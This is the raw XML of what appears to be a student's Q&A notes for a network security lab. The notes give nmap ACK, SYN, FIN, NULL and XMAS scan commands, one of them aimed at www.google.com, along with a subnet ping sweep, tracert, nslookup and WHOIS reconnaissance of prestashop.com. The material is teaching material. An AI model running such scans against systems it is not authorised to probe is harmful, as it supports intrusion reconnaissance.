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6E0E5" w14:textId="4C369500" w:rsidR="00A5079D" w:rsidRPr="00A5079D" w:rsidRDefault="002F22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Note:- </w:t>
      </w:r>
      <w:r w:rsidR="00A5079D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Question are similar website are different</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8EBE93" w14:textId="4A2C33AA" w:rsidR="00D978A8" w:rsidRDefault="00A81CFE">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="002C1C31">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C1C31" w:rsidRPr="002C1C31">
        <w:t xml:space="preserve"> Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C1C31" w:rsidRPr="002C1C31">
        <w:t>NMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C1C31" w:rsidRPr="002C1C31">
        <w:t xml:space="preserve"> to perform an ACK scan to determine if a port is filtered, unfiltered, or open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016E3C7D" w14:textId="43C67878" w:rsidR="002C1C31" w:rsidRDefault="002C1C31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009760EC" w:rsidRPr="00FC1848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009760EC" w:rsidRPr="00FC1848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009760EC" w:rsidRPr="00FC1848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009760EC" w:rsidRPr="00FC1848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4</w:t>
      </w:r>
      <w:r w:rsidR="00FC1848" w:rsidRPr="00FC1848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00FC1848" w:rsidRPr="00F63401">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00342B4E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EB13BA" w14:textId="1D727553" w:rsidR="00FC1848" w:rsidRDefault="00FC1848">
      <w:r>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1848">
        <w:t>Perform SYN, FIN, NULL, and XMAS scans to identify open ports and their Characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF9B7B" w14:textId="30821A94" w:rsidR="006F32EC" w:rsidRDefault="00FC1848" w:rsidP="006F32EC">
      <w:r>
        <w:t xml:space="preserve">A- </w:t>
      </w:r>
      <w:r w:rsidR="006F32EC">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006F32EC">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F32EC">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F32EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F32EC">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F32EC">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F32EC">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F32EC">
        <w:t xml:space="preserve"> -p &lt;port&gt; &lt;target-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C9101" w14:textId="77777777" w:rsidR="006F32EC" w:rsidRDefault="006F32EC" w:rsidP="006F32EC">
      <w:pPr>
        <w:ind w:left="720"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sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p &lt;port&gt; &lt;target-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C3AC9B" w14:textId="77777777" w:rsidR="006F32EC" w:rsidRDefault="006F32EC" w:rsidP="006F32EC">
      <w:pPr>
        <w:ind w:left="720"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-p &lt;port&gt; &lt;target-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5EFC88" w14:textId="0DC1769A" w:rsidR="00FC1848" w:rsidRPr="006F32EC" w:rsidRDefault="006F32EC" w:rsidP="006F32EC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs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sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p &lt;port&gt; &lt;target-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AD6794" w14:textId="106D507B" w:rsidR="006F32EC" w:rsidRDefault="006F32EC" w:rsidP="006F32EC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F32EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidR="00DB592D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (2,3,4,5,6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F0946" w14:textId="0DC1A6A4" w:rsidR="006F32EC" w:rsidRDefault="00DB592D" w:rsidP="006F32EC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/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7691D792" wp14:editId="3F1718AA">
            <wp:extent cx="2323629" cy="4130040"/>
            <wp:effectExtent l="0" t="7937" r="0" b="0"/>
            <wp:docPr id="208943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26422" cy="41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222B" w14:textId="2209BC98" w:rsidR="00BC2BE0" w:rsidRDefault="00BC2BE0" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidR="00CF0EFE" w:rsidRPr="00CF0EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use Wireshark to capture network traffic on a specific network interface. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF0EFE" w:rsidRPr="00CF0EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF0EFE" w:rsidRPr="00CF0EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the captured packets to extract relevant information and identify potential security issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5296FC8E" w14:textId="0683ED99" w:rsidR="00CF0EFE" w:rsidRDefault="00CF0EFE" w:rsidP="00BC2BE0">
      <w:r>
        <w:t xml:space="preserve">A- </w:t>
      </w:r>
      <w:r w:rsidR="008C2A63">
        <w:t>Practical number 5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C2A63">
        <w:t>A(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C2A63">
        <w:t>Mam Pdf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1755048C" w14:textId="77777777" w:rsidR="008C2A63" w:rsidRDefault="008C2A63" w:rsidP="00BC2BE0"/>
    <w:p w14:paraId="08D823AB" w14:textId="7D2B9D02" w:rsidR="008C2A63" w:rsidRDefault="008C2A63" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q.</w:t>
      </w:r>
      <w:r w:rsidR="00D44771" w:rsidRPr="00D44771">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D44771" w:rsidRPr="00D44771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D44771" w:rsidRPr="00D44771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cryptool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D44771" w:rsidRPr="00D44771">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform Encryption and Decryption of Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE8990F" w14:textId="1B6FBEFD" w:rsidR="00D44771" w:rsidRDefault="00D44771" w:rsidP="00BC2BE0">
      <w:r>
        <w:t xml:space="preserve">A. </w:t>
      </w:r>
      <w:r w:rsidR="00E86982">
        <w:t>Practical Number 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2AE600" w14:textId="75A22A3E" w:rsidR="00E86982" w:rsidRDefault="00BC656E" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC656E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Perform Network Analysis using following commands [20] a) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC656E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC656E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> b) c) ping 40 netstat d) </w:t>
      </w:r>
      <w:r w:rsidR="000A594A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEBF18" w14:textId="34083F7A" w:rsidR="000A594A" w:rsidRDefault="000A594A" w:rsidP="00BC2BE0">
      <w:r>
        <w:t>A. Practical Number 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB22C9" w14:textId="5FD59D7A" w:rsidR="00F87DAD" w:rsidRDefault="00F87DAD" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F87DAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execute the following tasks:  a) Perform network scan. b)</w:t>
      </w:r>
      <w:r w:rsidR="00077970" w:rsidRPr="00077970">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00077970" w:rsidRPr="00F87DAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Find active machines. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F87DAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> c) Find number of hops from source to destination. d) Perform ping command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F589A50" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="009C4F6F" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A.</w:t>
      </w:r>
      <w:r w:rsidR="00A459FA">
        <w:t xml:space="preserve"> a) Network Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3524EA19" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Tool Used: Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64357E72" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Command: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192.168.175.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7340D28C" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Result: Found 5 live hosts in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54266E" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077E953D" w14:textId="52AA5A39" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>b) Active Machines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2FED06" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Machines: 192.168.175.1, 192.168.175.5, 192.168.175.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4CAEF" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Verified via ping &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A80DF5A" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>c) Number of Hops to www.google.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D057A94" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> www.google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C5569" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Total hops: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C2CB3" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>d) Ping Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516B8846" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Command: ping www.google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FC46D" w14:textId="2557B694" w:rsidR="009C4F6F" w:rsidRDefault="00A459FA" w:rsidP="00A459FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Result: Average time = 25ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0522891E" w14:textId="77777777" w:rsidR="00A459FA" w:rsidRDefault="00A459FA" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6215ED83" w14:textId="1E3A59F8" w:rsidR="009C4F6F" w:rsidRDefault="009C4F6F" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidR="00972934" w:rsidRPr="00972934">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Find the number of hops from your PC to </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00972934" w:rsidRPr="00F63401">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>www.prestashop.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CF8E4A8" w14:textId="45F0C958" w:rsidR="00972934" w:rsidRDefault="00972934" w:rsidP="00BC2BE0">
      <w:r w:rsidRPr="005E48AA">
        <w:t xml:space="preserve">A. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F334E" w:rsidRPr="005E48AA">
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F334E" w:rsidRPr="005E48AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="001F334E" w:rsidRPr="005E48AA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.prestashop.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001F334E" w:rsidRPr="005E48AA">
        <w:t xml:space="preserve"> (Use CMD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125EDB1" w14:textId="48771CF7" w:rsidR="005E48AA" w:rsidRDefault="005E48AA" w:rsidP="00BC2BE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q. </w:t>
      </w:r>
      <w:r w:rsidRPr="005E48AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E48AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaisance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E48AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain following:  a) The domain name b) The URL c) Registrant name – Who registered the domain d) Email address </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E48AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e)IP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E48AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215AD475" w14:textId="77777777" w:rsidR="00F56E83" w:rsidRDefault="00662B17" w:rsidP="00BC2BE0">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A. </w:t>
      </w:r>
      <w:r>
        <w:t>Practical 1A</w:t>
      </w:r>
      <w:r w:rsidR="00F56E83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFAA384" w14:textId="498ED82A" w:rsidR="00F56E83" w:rsidRPr="00662B17" w:rsidRDefault="00F56E83" w:rsidP="00BC2BE0">
      <w:r w:rsidRPr="00F56E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBF5888" w14:textId="77777777" w:rsidR="00B318A2" w:rsidRPr="00B318A2" w:rsidRDefault="005E48AA" w:rsidP="00B318A2">
      <w:r w:rsidRPr="00563B1F">
        <w:t xml:space="preserve">A. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B318A2" w:rsidRPr="00B318A2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00B318A2" w:rsidRPr="00B318A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B318A2" w:rsidRPr="00B318A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Address</w:t>
      </w:r>
      <w:r w:rsidR="00B318A2" w:rsidRPr="00B318A2">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B318A2" w:rsidRPr="00B318A2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidR="00B318A2" w:rsidRPr="00B318A2">
        <w:t xml:space="preserve"> Open CMD </w:t>
      </w:r>
      <w:r w:rsidR="00B318A2" w:rsidRPr="00B318A2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="00B318A2" w:rsidRPr="00B318A2">
        <w:t xml:space="preserve"> Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B41F50" w14:textId="77777777" w:rsidR="00B318A2" w:rsidRPr="00B318A2" w:rsidRDefault="00B318A2" w:rsidP="00B318A2">
      <w:r w:rsidRPr="00B318A2">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07222BF7" w14:textId="77777777" w:rsidR="00B318A2" w:rsidRPr="00B318A2" w:rsidRDefault="00B318A2" w:rsidP="00B318A2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B318A2">
        <w:t>CopyEdit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44FD456C" w14:textId="77777777" w:rsidR="00B318A2" w:rsidRPr="00B318A2" w:rsidRDefault="00B318A2" w:rsidP="00B318A2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B318A2">
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B318A2">
        <w:t xml:space="preserve"> www.prestashop.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D1DE5" w14:textId="77777777" w:rsidR="00B318A2" w:rsidRPr="00B318A2" w:rsidRDefault="00B318A2" w:rsidP="00B318A2">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B318A2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B318A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Registrant Name and Email Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:t xml:space="preserve"> Visit any WHOIS lookup site:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6650B5FA" w14:textId="77777777" w:rsidR="00B318A2" w:rsidRPr="00B318A2" w:rsidRDefault="00B318A2" w:rsidP="00B318A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00B318A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://who.is</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41622537" w14:textId="77777777" w:rsidR="00B318A2" w:rsidRDefault="00B318A2" w:rsidP="00B318A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B318A2">
        <w:t>https://lookup.icann.org</w:t>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:t xml:space="preserve"> Search for prestashop.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00B318A2">
        <w:t xml:space="preserve"> Check "Registrant Contact" section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778D5D4E" w14:textId="77777777" w:rsidR="0030319C" w:rsidRDefault="0030319C" w:rsidP="00B318A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E3D748" w14:textId="77777777" w:rsidR="0030319C" w:rsidRDefault="0030319C" w:rsidP="00B318A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D217F40" w14:textId="77777777" w:rsidR="0030319C" w:rsidRDefault="0030319C" w:rsidP="00B318A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42662405" w14:textId="77777777" w:rsidR="0030319C" w:rsidRDefault="0030319C" w:rsidP="00B318A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589BCE55" w14:textId="77777777" w:rsidR="0030319C" w:rsidRDefault="0030319C" w:rsidP="00B318A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
